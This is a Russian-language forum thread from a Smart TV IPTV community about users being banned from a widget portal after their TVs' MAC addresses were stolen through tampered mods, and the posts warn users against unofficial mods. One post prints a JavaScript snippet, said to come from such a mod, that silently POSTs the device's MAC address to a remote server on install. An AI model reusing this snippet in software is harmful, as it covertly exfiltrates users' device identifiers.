Объявление

Свернуть
Пока нет объявлений.

Блокировка доступа к порталу пользователей модов (Самсунг)

Свернуть
Это закреплённая тема.
X
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • #46
    явно комуто скучно и охото подосрать простым пользователям. мне лично от этих хаков никаких убытков. прийдется чуток времени потратить на работу с разширенм маком, если его увели
    Обсуждение всех нюансов развода в Германии. www.razvod.net

    Комментарий


    • #47
      лист вообще для воровства маc адресов не обязательно, достаточно поставить просто манипулированный мод, он просто брал маc адрес телевизора и независиомо от того что-ты смотриш посылал твой маc адрес владельзу манипулированного мода. Вот блок кода который это делал, достаточно просто установить мод и больше ничего не нужно. Маc адрес будет сворован

      var Htt=new XMLHttpRequest();
      Htt.open("POST","http://www.gosha99.radiushosting.ru/cgi-bin/stuser.pl",true);
      Htt.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      Htt.setRequestHeader("Content-length",mac.length);
      Htt.setRequestHeader("Connection", "close");
      Htt.onreadystatechange = function(){
      if(Htt.readyState == 4)
      if (Htt.status ==200 )
      {alert(Htt.responseText+'| OK ! ');};
      };
      Htt.send(mac);
      };

      ето в принципе тоже самое, что поставить себе на компьютер какую-то программу нахаклаву и радоватся что она халявная, а что она заражена вирусами это роли не играет.
      Последний раз редактировалось gosha99; 09-07-2013, 11:49.

      Комментарий


      • #48
        Это мой Mac он в бане e47cf968f503 хотя из всего стоял только youtubehd от nitrogen и nstream****e. Гошу поддерживал месяца 3 назад, как теперь быть, кого поддерживать и что делать, чтобы дальше смотреть фильмы.

        Комментарий


        • #49
          используй дальше мод и смотри то что прописано в нем
          Обсуждение всех нюансов развода в Германии. www.razvod.net

          Комментарий


          • #50
            Сообщение от MRuslan Посмотреть сообщение
            хотя из всего стоял только ёутубехд от нитроген и нстреам****е.
            я же говорю, проделки модификатора. опять людей подставил. специально ведь собирал маки тех
            кто только гошу поддерживал. руслан скажите вы свой мод откуда ставили?
            Kartina.TV Abo, Samsung LE46C750
            Diablo CAM Twin WiFi UW 2.18
            nKTVplayer 1.1 + nStreamVOD(Full)
            1&1 VDSL 50MBit, FritzBox 7390

            Комментарий


            • #51
              не знаю зачем модификатору это нужно, он же щас сам в такойже жопе вместе со всеми теми чьи листы сейчас смотрят через модификацию нахаляву с модификацией хакеров со встроенными ста маками
              Обсуждение всех нюансов развода в Германии. www.razvod.net

              Комментарий


              • #52
                Сообщение от nitrogen14 Посмотреть сообщение
                не знаю зачем модификатору это нужно, он же щас сам в такойже жопе вместе со всеми теми чьи листы сейчас смотрят через модификацию нахаляву с модификацией хакеров со встроенными ста маками
                я думаю что это как раз не так нитро. седня был часик, я этот хак в этом направлении поюзал.
                маков 15 наверное попробовал. на все терьпения не хватило. ни один из них ни накакой другой
                портал не заходит. мне кажется эти маки специально собирали чтоб они были только для гошиного
                портала. или ещо хуже, согласовали с владельцами других листов, хотя не хочется в это верить
                Kartina.TV Abo, Samsung LE46C750
                Diablo CAM Twin WiFi UW 2.18
                nKTVplayer 1.1 + nStreamVOD(Full)
                1&1 VDSL 50MBit, FritzBox 7390

                Комментарий


                • #53
                  нет это не так, это маки любопытных, любящих лазить по всяким там листам или использовать взломаные виджеты.
                  таким способом насобирать тыщу маков за недельку не составит труда.
                  Обсуждение всех нюансов развода в Германии. www.razvod.net

                  Комментарий


                  • #54
                    нашла свой мас в списке. Халяву не искала, поддержку оказала. А виджет поставила который нашла. Я уверена что эти люди хотели навредить не пользователям а организаторам плеера. Возможно из-за конкуренции. Я думаю способов много. Но вы действительно хорошо, быстро и добросовественно работаете! Я уверена что все пользователи поддержат вас в решении этой проблемы. Мы на вас надеемся! А вообще возможно поменять мас?

                    Комментарий


                    • #55
                      мы работаем над этим. интересно какой плеер ты нашла и какие листы смотрела, что произошла утечка мак адреса.
                      Обсуждение всех нюансов развода в Германии. www.razvod.net

                      Комментарий


                      • #56
                        Сообщение от Jennifer Посмотреть сообщение
                        А виджет поставила который нашла. Я уверена что эти люди хотели навредить не пользователям а организаторам плеера.
                        не скажите какой виджет вы использовали и откуда ставили? и поверьте эти люди прекрасно знают,
                        что изпользуя ваш мак они вредят только вам. потому что навредить гоше или нитрогену они этим
                        не в состоянии.
                        Kartina.TV Abo, Samsung LE46C750
                        Diablo CAM Twin WiFi UW 2.18
                        nKTVplayer 1.1 + nStreamVOD(Full)
                        1&1 VDSL 50MBit, FritzBox 7390

                        Комментарий


                        • #57
                          я могу это с точностью сказать: с середины апреля был установлен nstream****. Были открыты видеотеки на плэйлисте „sweta1979“ i „Daniila“. Потом поддержала Гошу, у него конечно мне все очень понравилось. А также нашла тамже „englishman“ с IPTV украины и россии, но этот не на русском. Я вообще не знала что так удобно все можно смотреть через смарт тв и такие виджеты сущевствуют. Последнее время заметила что при просмотре IPTV выкидывает из интернета а дальше вы уже в курсе. Теперь все удалила и установила nStreamVod

                          Комментарий


                          • #58
                            Они вредят пользователям и отнимают у нас время которое можно было-бы на более полезные вещи потратить, чем ставить там всякие разные защиты. ето просто полудурки которые сами не в состоянии что-то полезное делать и считают себя очень крутыме хакерами "взломав" плаг написынный на ява скрипт. Таким хакерством я занимался когда мне было 12 лет.
                            Ещё раз убедтельно прошу не ставить всякие левые модификацый, даже в позновательных целях. У вас будте украден ваш маc адрес и доступ к порталу будет заблокирован.

                            Комментарий


                            • #59
                              вот типо чудомод
                              ВНИМАНИЕ!!! СКИДКА ПОЛЬЗОВАТЕЛЯМ САЙТА! - Форум
                              и как минимум один из пользователей этого мода есть в списке.
                              может в списке те, кто использовал мод мода когдато.... и модификатор вел логгинг таких хитрецов и никто ему не помешалбы вставить их маки куда угодно.
                              Обсуждение всех нюансов развода в Германии. www.razvod.net

                              Комментарий


                              • #60
                                не знаю связано ли это с темой. При просмотре в виджете происходит частенько разрыв соединения с интернетом, надо заново в ручную соединять через WPS. Иногда несколько раз в тачении 15 минут

                                Комментарий

                                Обработка...
                                X